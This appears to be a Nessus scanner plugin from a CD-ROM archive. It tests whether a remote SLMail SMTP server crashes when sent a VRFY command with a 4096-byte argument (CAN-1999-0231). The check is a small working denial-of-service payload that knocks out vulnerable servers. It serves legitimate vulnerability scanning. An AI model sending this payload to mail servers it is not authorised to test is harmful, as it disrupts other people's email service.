home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / slmail.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  85 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7.  
  8. if(description)
  9. {
  10.  script_id(10254);
  11.  script_version ("$Revision: 1.14 $");
  12.  script_cve_id("CAN-1999-0231");
  13.  
  14.  name["english"] = "SLMail denial of service";
  15.  name["francais"] = "DΘni de service contre SLMail";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "It was possible to perform a denial
  19. of service against the remote SMTP server by
  20. sending a too long argument to the VRFY command.
  21.  
  22. This problem allows an attacker to bring down
  23. your mail system, preventing you from sending
  24. and receiving emails.
  25.  
  26.  
  27. Solution : Update your MTA, or change it.
  28.  
  29. Risk factor : High";
  30.  
  31.  desc["francais"] = "Il a ΘtΘ possible de crΘer
  32. un dΘni de service contre le serveur SMTP
  33. distant en envoyant un argument trop long α
  34. la commande VRFY.
  35.  
  36. Ce problΦme permet α un pirate de mettre α
  37. genoux votre systΦme de mail, vous empechant
  38. ainsi d'envoyer ainsi que de recevoir des
  39. messages.
  40.  
  41. Solution : Mettez α jour votre MTA, ou changez-le.
  42. Facteur de risque : SΘrieux";
  43.  
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "VRFY aaaaa(...)aaa crashes the remote MTA";
  48.  summary["francais"] = "VRFY aaaa(....)aaa plante le MTA distant";
  49.  
  50.  script_summary(english:summary["english"], francais:summary["francais"]);
  51.  
  52.  script_category(ACT_DENIAL);
  53.  
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  56.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  57.  family["english"] = "Denial of Service";
  58.  family["francais"] = "DΘni de service";
  59.  script_family(english:family["english"], francais:family["francais"]);
  60.  script_dependencie("find_service.nes", "sendmail_expn.nasl");
  61.  script_exclude_keys("SMTP/wrapped");
  62.  script_require_ports("Services/smtp", 25);
  63.  exit(0);
  64. }
  65.  
  66. #
  67. # The script code starts here
  68. #
  69.  
  70.  
  71. port = get_kb_item("Services/smtp");
  72. if(!port)port = 25;
  73. if(get_port_state(port))
  74. {
  75.  soc = open_sock_tcp(port);
  76.  if(soc)
  77.  {
  78.   data = string("VRFY ", crap(4096), "\r\n");
  79.   send(socket:soc, data:data);
  80.   close(soc);
  81.   soc2 = open_sock_tcp(port);
  82.   if(!soc2)security_hole(port);
  83.  }
  84. }
  85.